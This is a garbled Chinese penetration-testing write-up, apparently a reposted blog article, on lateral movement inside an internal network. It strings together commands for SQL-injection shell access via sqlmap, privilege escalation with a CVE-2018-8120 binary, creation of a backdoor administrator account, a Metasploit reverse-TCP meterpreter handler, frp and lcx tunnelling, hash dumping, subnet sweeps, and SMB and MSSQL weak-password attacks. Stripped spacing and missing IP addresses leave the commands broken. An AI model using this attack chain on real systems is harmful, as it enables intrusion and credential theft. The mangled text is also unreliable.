1、干貨|內(nèi)網(wǎng)滲透之橫向滲透作者：hackctf原文鏈接：/s/swR6XsuK7j8rzIHIRxw5Nw本文由 干貨收集整理：/test/index.php在一次測試中發(fā)現(xiàn)某系統(tǒng)存在SQL注入漏洞。且IIS可暴露絕對路徑。使用-os-shell命令，填寫絕對路徑可執(zhí)行系統(tǒng)命令。1sqlmap在執(zhí)行-os-shellI命令時向服務(wù)器寫入了上傳文件的腳本。權(quán)限不夠，上傳cve-2018-8120.exe進(jìn)行提權(quán)。2cve-2018-8120.exewhoamicve-2018-8120.exenetuseradmin

2、test1234qwer./addcve-2018-8120.exenetlocalgroupadministratorsadmintest/add選擇自己上傳msf馬(由veil生成)，由frp穿透到內(nèi)網(wǎng)。詳情參考： getshell的進(jìn)一步利用use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost exploit -jportfwd add -l 3389-r 0-p33893注： 依然需要在frpc上進(jìn)行配置。為了在內(nèi)網(wǎng)獲取更多服務(wù)器，需要獲取管理員a

3、dministrator的。在登錄成功的前提下，以管理員身份再次運(yùn)行msf馬，可順利提權(quán)至system。getuid getsystem通過各種攻擊提升到system權(quán)限4run post/windows/gather/hashdump run post/windows/gather/checkvm獲取系統(tǒng)hash嘗試md5一下。nice！使用administrator來登錄。5比如mysql數(shù)據(jù)庫。6for /l%iin (1,1,255) do ping10.0.15.%i-w1-n1 |find/ittl=meterpreter添加路由。runget_local_subnetsrunau

4、toroute -s /24添加路由使用metasploit模塊查看一下該局域網(wǎng)開啟3389的服務(wù)器。7use setrunauxiliary/scanner/rdp/rdp_scanner rhosts 0-33掃描smb登錄use set set setrunauxiliary/scanner/smb/smb_loginRHOSTSSMBUser SMBPass0-33administrator 123456a?8910繼續(xù)。 。 上傳hsscan工具掃描一下弱口令。使用metasploit的mssql模塊來添加管理員。use auxiliary/admin/mssql/mssql_execset RHOST2set USERNAMEsaset PASSWORDsoft11set CMD runnet user admintest1234qwer. /addok！go，go，go。重復(fù)之前的操作。上傳msf馬并以管理員身份運(yùn)行。12MD5一下。 。以administrator登錄13再次批量掃描smb。 又獲取幾臺服務(wù)器。嘗試登錄3試試14為了更加方便遠(yuǎn)程服務(wù)器，上傳lcx.exe工具進(jìn)行端口轉(zhuǎn)發(fā)。./portmap -m